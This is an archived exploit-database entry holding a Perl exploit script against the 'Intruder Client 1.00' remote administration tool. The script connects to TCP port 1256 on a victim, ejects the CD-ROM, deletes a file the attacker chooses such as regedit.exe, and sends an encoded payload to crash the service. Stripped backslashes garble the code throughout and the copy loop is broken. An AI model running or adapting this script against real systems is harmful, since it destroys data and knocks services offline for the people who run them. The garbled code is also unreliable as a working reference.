https://www.exploit-db.com/exploits/1115

漏洞细节尚未披露

#!/usr/bin/perl
#
# Intruder Command Execution DOS Exploit
# --------------------------------------
#   Infam0us Gr0up - Securiti Research
#
#
# [?] Version: libwww-perl-5.76
# [+] Connecting to 127.0.0.1..
# [+] Connected
# [+] Backup for files..[DONE]
# [+] Build malicious pages..[DONE]
# [+] Open CDRom victim..[DONE]
# [+] Delete C:WINNTregedit.exe..[DONE]
# [+] Now attacking ..[SUCCESS]
# [+] Check if Server D0S'ed!
#
# Tested on Windows2000 SP4(Win NT)
# Info : infamous.2hell.com
#

use IO::Socket;
use LWP;
use Tk;
use Win32::File;


$subject = "Intruder Command Execution DOS Exploit";
$vers = "Intruder Client 1.00";
$vendor = "http://digilander.iol.it/TatankaRock";
$codz = "basher13 - basher13(at)linuxmail.org";

$ARGC=@ARGV;

if ($ARGC !=2) {
    print "n";
    print "     $subjectn";
    print "-------------------------------------------------n";
    print "     Infam0us Gr0up - Securiti Researchnn";
    print "Usage: $0 [remote IP] [file Path]n";
    print "Exam: $0 127.0.0.1 C:\WINNT\regedit.exen";
    print "- [remote IP] = Target host IP/Hostnamen";
    print "- [file Path] = Path file to deleten";
    exit(1);
}

$host = $ARGV[0];
$delfile = $ARGV[1];
# Modify to own feed
$text = "Subject: $subject
Version: $vers
URL: $vendor
Coders: $codz";
$box = "C:-[$subject]-.htm";

$shellcore = 
"Moving_Dialog,0x13:test:1"."x68x62x69x1x1x68x72x64x60x73x68x68x21x53".
"x64x68x74x73x68x75x68x21x52x64x62x68x74x71x21x2Cx68x21x46x73x31".
"x68x6Cx31x74x72x68x48x6Fx67x60x68x21x43x58x21x68x55x40x42x4Ax68".
"x46x21x40x55x68x43x44x48x4Fx68x49x40x45x21x68x58x4Ex54x21x68x42".
"x4Ax20x20x68x40x55x55x40x68x45x4Ex52x21x68x42x4Ax20x20x68x40x55".
"x55x40x68x45x4Ex52x21x33xC9x8BxDCx80x33x1x43x41x83xF9x52x75xF6".
"x54xC3";

print "n";
print "       $subjectn";
print "-------------------------------------------------------n";
print "[?] Version: libwww-perl-$LWP::VERSIONn";
print "[+] Connecting to $host..n";
sleep(2);
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 1256,
                                Proto => 'tcp');
                                die unless $socket;
print "[+] Connectedn";
sleep(2);
print "[+] Backup for files..";
$lama = $delfile;
$baru = "$delfile.BAK.$$(basher13)";

 open(OLD, "< $lama")         or die "FAILED to open $laman[-] Reason: Try to another place..n";
 open(NEW, "> $baru")         or die "can't open $baru: $!n";

 while () {
        s/b(p)earlb/${1}erl/i;
        (print NEW $_)       or die "FAILED to write to $barun[-] Reason: Server has secure permissionn";
    }
 close(OLD)                  or die "FAILED to close $laman";
 close(NEW)                  or die "can't close $barun";
print "[DONE]n";     
print "[+] Build malicious pages..";

open(OUT, ">$box") or die("unable to open $box: $!");
open FH, ">$box";
print FH "$text";
print "[DONE]n";
close FH;

print "[+] Open CDRom victim..";
print $socket "OpenCDROM,";
sleep(1);
print "[DONE]n";
print "[+] Delete $delfile..";
print $socket "Move,$delfile|$box";
sleep(2);
print "[DONE]n";
print "[+] Now attacking ..";
sleep(1);
print $socket "$shellcore";
sleep(3);
print "[SUCCESS]n";
close $socket;
print "[+] Server D0S'ed!n";
print "-------------------------------------------------------n";
my $mw = MainWindow->new(-title => 'INFO',);
    my $var;

    my $opt = $mw->Optionmenu(
                
                -options => [qw()],
                -command => sub { print "[>] ", shift, "n" },
                -variable => $var,
                )->pack;
    $opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]);   
    $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack;
    MainLoop;

# milw0rm.com [2005-07-21]